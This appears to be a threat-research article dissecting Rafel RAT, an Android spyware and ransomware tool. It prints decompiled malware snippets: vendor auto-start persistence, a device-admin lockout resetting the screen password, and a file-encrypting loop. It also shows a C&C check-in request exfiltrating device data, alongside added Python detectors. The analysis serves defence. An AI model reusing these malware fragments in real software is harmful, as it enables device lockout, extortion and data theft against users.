Rafel RAT is an open-source malware tool designed to operate stealthily on Android devices. This powerful remote administration toolkit enables malicious actors to conduct a range of nefarious activities, from data theft to device manipulation.
Recent investigations by Check Point Research (CP Research) have shown that it is currently used by multiple threat actors, including espionage groups.
This [Threat Research](https://www.secureblink.com/threat-research) analysis will rigorously dissect the critical nuances of Rafel RAT, its operational mechanisms, and the broader implications of its deployment.
### Key Features and Capabilities
Rafel RAT boasts a suite of features that facilitate its covert operations. These include:
- **Admin Permission:** Grants the malware elevated privileges.
- **Whitelist Inclusion:** Requests exclusion from battery optimization, ensuring persistence.
- **Legitimate Appearance:** Disguised as a legitimate mod app.
- **Background Execution:** Operates even when the app is closed (limited device compatibility).
- **Accessibility Features:** Utilizes accessibility services, although this may cause errors on some devices.
- **Android Support:** Compatible with Android versions 5 through 12.
- **Wakelock Acquisition:** Prevents the device from sleeping.
- **Undetectability:** Bypasses Google Play Protect, making it challenging to detect.
- **Device Manipulation:** Can wipe the SD card, lock the device screen, change wallpaper, vibrate the device, delete call logs, and notify victims via Discord.
- **Notification Theft:** Steals notifications and sends them through Discord.
- **AutoStart Capability:** Configured for devices from manufacturers like Poco, Xiaomi, Oppo, Vivo, LetV, and Honor.
### Campaigns and Victim Analysis
The deployment of Rafel RAT spans approximately 120 distinct malicious campaigns, targeting high-profile organizations, including military sectors. Victims predominantly hail from the United States, China, and Indonesia, but the geographic spread is extensive.
Notably, Samsung devices were most frequently targeted, followed by Xiaomi, Vivo, and Huawei. The malware’s ability to extract sensitive information, such as phonebook contacts and two-factor authentication messages, poses significant risks, enabling lateral movement within organizations.
### Technical Analysis
#### Permission Request Mechanism
Upon initiation, Rafel RAT requests the permissions it needs to operate. The auto-start routine exemplifies this approach: it opens the vendor-specific auto-start management screen so the app can be allowed to launch at boot, helping it persist across reboots.
```java
private void autostart() {
    try {
        Intent intent = new Intent();
        String manufacturer = android.os.Build.MANUFACTURER;
        // Each vendor ships its own auto-start management screen; select the
        // matching activity so the user can be prompted to allow launch at boot.
        if ("xiaomi".equalsIgnoreCase(manufacturer)) {
            intent.setComponent(new ComponentName("com.miui.securitycenter",
                    "com.miui.permcenter.autostart.AutoStartManagementActivity"));
        } else if ("oppo".equalsIgnoreCase(manufacturer)) {
            intent.setComponent(new ComponentName("com.coloros.safecenter",
                    "com.coloros.safecenter.permission.startup.StartupAppListActivity"));
        } else if ("vivo".equalsIgnoreCase(manufacturer)) {
            intent.setComponent(new ComponentName("com.vivo.permissionmanager",
                    "com.vivo.permissionmanager.activity.BgStartUpManagerActivity"));
        } else if ("Letv".equalsIgnoreCase(manufacturer)) {
            intent.setComponent(new ComponentName("com.letv.android.letvsafe",
                    "com.letv.android.letvsafe.AutobootManageActivity"));
        } else if ("Honor".equalsIgnoreCase(manufacturer)) {
            // Honor devices use Huawei's system manager
            intent.setComponent(new ComponentName("com.huawei.systemmanager",
                    "com.huawei.systemmanager.optimize.process.ProtectActivity"));
        }
        // Only launch the screen if some activity can handle the intent; on an
        // unsupported manufacturer the intent has no component and nothing matches.
        List<ResolveInfo> list = getPackageManager().queryIntentActivities(intent, PackageManager.MATCH_DEFAULT_ONLY);
        if (list.size() > 0) {
            startActivity(intent);
        }
    } catch (Exception e) {
        // Failures are swallowed so the app never crashes on unsupported vendors
        Log.e("exc", String.valueOf(e));
    }
}
```
### Phishing and Deception Tactics
Rafel RAT leverages deceptive tactics to manipulate user trust and exploit interactions. It often impersonates legitimate applications like Instagram, WhatsApp, e-commerce platforms, antivirus programs, and support apps. These deceptive strategies enhance its ability to evade detection and gain necessary permissions.
![Malware Activity.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Malware_Activity_469e641652.jpg)
***Malware Activity [CP Research](https://research.checkpoint.com/2024/rafel-rat-android-malware-from-espionage-to-ransomware-operations/)***
#### Background Service Operations
Once activated, Rafel RAT deploys a background service to manage communication with the command-and-control (C&C) server.
```java
@Override // android.app.Service
public int onStartCommand(Intent intent, int flags, int startId) {
    String input = intent.getStringExtra("inputExtra");
    this.createNotificationChannel();
    // Tapping the notification returns to MainActivity; the flags value of 0
    // makes the PendingIntent neither immutable nor one-shot
    PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, new Intent(this, MainActivity.class), 0);
    // A foreground service must show a persistent notification; the generic
    // "Foreground Service" title is what the victim sees in the notification shade
    Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID)
            .setContentTitle("Foreground Service")
            .setContentText(input)
            .setSmallIcon(R.drawable.ic_notification)
            .setContentIntent(pendingIntent)
            .build();
    startForeground(1, notification);
    return START_NOT_STICKY; // the system will not recreate the service if it is killed
}
```
The InternalService initializes communication, activates location tracking, and sets up Text-To-Speech components.
```java
private void init() {
    // Shared-preferences wrapper named "prefs" opened in private mode (0)
    new Builder().setContext(this.context).setMode(0).setPrefsName("prefs").setPrefsMode(0).build();
    // Pseudo-unique ID derived from Build fields; used as the device identifier reported to the C&C
    this.deviceUniqueId = new EasyIdMod(this.context).getPseudoUniqueID();
    this.getDeviceInfo();        // collect model, OS version, operator, etc.
    this.checkCmdFromServer();   // begin polling the C&C server for commands
    this.startLocationService(); // enable live location tracking
    this.prepareTTs();           // set up Text-To-Speech for voice messages
}
```
### Communication Protocols
Communication with the C&C server occurs over HTTP(S) protocols. Initial client-server interactions involve transmitting device information, including identifiers, locale, country, model specifics, and operator details.
```plaintext
POST /Server_Panel/public/commands.php HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0
country=US&total_ram=1.811512&unique_id=abcdefg12345&device_model=LGE-Nexus%205&device_language=en&is_rooted=false&software_version=Android%206.0.1&sim_operator=&charge=42%
```
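The check-in above has a recognisable shape: a form-encoded POST to a `commands.php` path carrying a fixed set of device fields. The following is an added example (not code from the original article or from the malware) that scores HTTP request records against that pattern, so it can be run over proxy or sandbox output; the two sample records are constructed for this example, and the field-overlap threshold is an assumption.

```python
from urllib.parse import parse_qs, urlparse

# Parameter names in the check-in body quoted above.
RAFEL_FIELDS = {"country", "total_ram", "unique_id", "device_model",
                "device_language", "is_rooted", "software_version",
                "sim_operator", "charge"}
MIN_FIELD_OVERLAP = 5  # assumption: tolerate builds that drop or rename a few fields

def score_request(method, url, headers, body):
    """Match one HTTP request against the Rafel check-in pattern. Returns the
    verdict, the matched indicators and the device fields the beacon leaked."""
    reasons = []
    if method.upper() == "POST" and urlparse(url).path.endswith("/commands.php"):
        reasons.append("path:commands.php")
    if headers.get("User-Agent", "").startswith("okhttp/"):
        reasons.append("ua:okhttp")  # weak on its own: okhttp is used by many apps
    # keep_blank_values keeps "sim_operator="; the bare trailing '%' in
    # "charge=42%" is not valid percent-encoding and is passed through as-is
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    overlap = RAFEL_FIELDS & set(params)
    if len(overlap) >= MIN_FIELD_OVERLAP:
        reasons.append("fields:%d/%d" % (len(overlap), len(RAFEL_FIELDS)))
    suspicious = "path:commands.php" in reasons and len(overlap) >= MIN_FIELD_OVERLAP
    leaked = {k: params[k] for k in ("unique_id", "device_model",
                                     "software_version", "is_rooted") if k in params}
    return {"suspicious": suspicious, "reasons": reasons, "device": leaked}

# Constructed sample records: the first mirrors the capture quoted above, the
# second is an ordinary form login that shares the okhttp User-Agent.
SAMPLE_REQUESTS = [
    ("POST", "https://example.com/Server_Panel/public/commands.php",
     {"User-Agent": "okhttp/3.10.0", "Content-Type": "application/x-www-form-urlencoded"},
     "country=US&total_ram=1.811512&unique_id=abcdefg12345&device_model=LGE-Nexus%205"
     "&device_language=en&is_rooted=false&software_version=Android%206.0.1"
     "&sim_operator=&charge=42%"),
    ("POST", "https://example.com/api/login",
     {"User-Agent": "okhttp/3.10.0", "Content-Type": "application/x-www-form-urlencoded"},
     "username=alice&password=hunter2&remember=1"),
]

def scan(requests=SAMPLE_REQUESTS):
    return [score_request(*req) for req in requests]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, scan()):
        print(req[1], "->", "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

The leaked `device` fields are returned so a triage analyst can tie a beacon back to a specific handset model and OS version.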
### Command Execution
The range of commands supported by Rafel RAT is extensive. Commands include:
- **rehber_oku:** Exfiltrates the phone book.
- **sms_oku:** Extracts all SMS messages.
- **send_sms:** Sends SMS messages.
- **device_info:** Transmits device information.
- **location_tracker:** Sends live location data.
- **arama_gecmisi:** Exfiltrates call logs.
- **screen_message:** Displays a floating message.
- **wipe:** Deletes specified files.
- **LockTheScreen:** Locks the device screen.
- **ransomware:** Initiates file encryption.
- **changewallpaper:** Changes the device wallpaper.
- **vibrate:** Vibrates the device for 20 seconds.
- **deletecalls:** Wipes call history.
- **voice_message:** Uses Text-to-Speech to relay messages.
- **get_list_file:** Sends directory tree information.
- **upload_file_path:** Uploads specific files.
- **application_list:** Lists installed applications.
### Defensive Measures and Evasion Tactics
Rafel RAT employs several protective mechanisms to evade detection and disrupt analysis. These include string encryption, the use of packers, and anti-analysis techniques designed to evade automated analysis tools.
### Command & Control Interface
The C&C interface for Rafel RAT is a PHP-based panel that does not require a traditional database. Instead, it utilizes JSON files for storage and management. Upon logging in, threat actors can access detailed information about infected devices and execute various commands.
![9MGUJS4ZGU-rId70.webp](https://sb-cms.s3.ap-south-1.amazonaws.com/9_MGUJS_4_ZGU_r_Id70_19bb8c2da0.webp)
***Admin Panel***
#### Panel Features
- **Device Information:** Phone model, Android version, geographical context, SIM operator, battery charge, and root status.
- **Commands:** Retrieve contacts, SMS messages, device info, call logs, and location data. Execute ransomware, change wallpapers, lock screens, and more.
### Case Studies and Campaigns
#### Ransomware Operations
Rafel RAT's ransomware capabilities include locking the screen and encrypting files using AES encryption. The malware can change the lock-screen password, preventing users from revoking admin privileges.
```java
public class DeviceAdminComponent extends DeviceAdminReceiver {
    private static final String OUR_SECURE_ADMIN_PASSWORD = "1234";

    // Invoked when the user attempts to deactivate the device administrator
    @Override
    public CharSequence onDisableRequested(Context context, Intent intent) {
        ComponentName localComponentName = new ComponentName(context, DeviceAdminComponent.class);
        DevicePolicyManager localDevicePolicyManager =
                (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
        if (localDevicePolicyManager.isAdminActive(localComponentName)) {
            // Force a numeric lock-screen password, set it to "1234" and lock the
            // device immediately, so the user cannot complete the deactivation
            localDevicePolicyManager.setPasswordQuality(localComponentName, DevicePolicyManager.PASSWORD_QUALITY_NUMERIC);
            localDevicePolicyManager.resetPassword(OUR_SECURE_ADMIN_PASSWORD, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY);
            localDevicePolicyManager.lockNow();
        }
        return super.onDisableRequested(context, intent);
    }
}
```
Additionally, the malware incorporates file encryption methods.
```java
// files and KEY are fields of the enclosing class; Aes, fullyReadFileToBytes
// and saveFile are helpers defined elsewhere in the sample
public void encryptFile() throws Exception {
    for (File file : files) {
        // Skip files already carrying the ".enc" marker so nothing is encrypted twice
        if (!file.getPath().contains(".enc")) {
            byte[] enc = Aes.encrypt(KEY, fullyReadFileToBytes(file));
            file.delete();                          // remove the plaintext original
            saveFile(enc, file.getPath() + ".enc"); // write the ciphertext with the marker suffix
        }
    }
}
```
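The vendor auto-start activities, the command vocabulary, the device-admin lockout calls and the `.enc` suffix shown above are all plain strings in the sample, which makes them usable for static triage. The following is an added example (not the article's or the malware's code) that scores a string table extracted from an APK against those traits; the two string sets and the verdict thresholds are constructed assumptions for this example.

```python
# Indicators drawn from the decompiled snippets and command list above.
AUTOSTART_ACTIVITIES = {
    "com.miui.permcenter.autostart.AutoStartManagementActivity",
    "com.coloros.safecenter.permission.startup.StartupAppListActivity",
    "com.vivo.permissionmanager.activity.BgStartUpManagerActivity",
    "com.letv.android.letvsafe.AutobootManageActivity",
    "com.huawei.systemmanager.optimize.process.ProtectActivity",
}
COMMAND_WORDS = {"rehber_oku", "sms_oku", "send_sms", "arama_gecmisi",
                 "location_tracker", "LockTheScreen", "ransomware",
                 "changewallpaper", "deletecalls", "get_list_file",
                 "upload_file_path", "application_list"}
LOCKOUT_APIS = {"resetPassword", "lockNow", "onDisableRequested"}

def triage_strings(strings):
    """Return per-trait hits and a verdict for one APK's string table."""
    found = set(strings)
    hits = {
        "autostart": sorted(AUTOSTART_ACTIVITIES & found),
        "commands": sorted(COMMAND_WORDS & found),
        "lockout": sorted(LOCKOUT_APIS & found),
        "c2_path": sorted(s for s in found if s.endswith("commands.php")),
        "enc_suffix": ".enc" in found,
    }
    # The command vocabulary is the distinctive trait; an auto-start screen or
    # lockNow() alone is normal for launchers and MDM agents, so require
    # several commands plus at least one supporting trait (assumed thresholds).
    other = sum(bool(hits[k]) for k in ("autostart", "lockout", "c2_path", "enc_suffix"))
    hits["verdict"] = "rafel-like" if len(hits["commands"]) >= 3 and other >= 1 else "clean"
    return hits

# Constructed samples: a dump resembling the snippets above, and an MDM-style
# agent that legitimately locks the device and opens the MIUI auto-start screen.
RAFEL_LIKE = ["com.miui.permcenter.autostart.AutoStartManagementActivity",
              "com.coloros.safecenter.permission.startup.StartupAppListActivity",
              "rehber_oku", "sms_oku", "arama_gecmisi", "ransomware",
              "resetPassword", "lockNow", "onDisableRequested",
              "Server_Panel/public/commands.php", ".enc", "inputExtra"]
MDM_AGENT = ["com.miui.permcenter.autostart.AutoStartManagementActivity",
             "lockNow", "setPasswordQuality", "inputExtra", "policy.json"]

if __name__ == "__main__":
    for name, dump in (("rafel_like", RAFEL_LIKE), ("mdm_agent", MDM_AGENT)):
        print(name, triage_strings(dump)["verdict"])
```

Because string encryption and packing are among the sample's evasion tactics, this check belongs after unpacking or on decrypted-string output, not on the raw APK.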
### Threat Actors and Government Infrastructure
One notable case involved a threat actor hacking a Pakistani government website and using it as a C&C server for Rafel RAT. The hacker publicly celebrated the breach, highlighting the threat's potential impact on government infrastructure.
### Indicators of Compromise (IOCs)
- **Files:** Indicators from various campaigns including MD5 hashes, email addresses, and additional IP addresses.
### Conclusion
Rafel RAT represents a sophisticated and versatile threat to Android devices, with wide-ranging capabilities from espionage to ransomware deployment. Its deployment in numerous campaigns targeting high-profile sectors underscores its danger. Understanding its inner workings, from permissions to C&C communication, equips cybersecurity professionals to better defend against and mitigate this threat.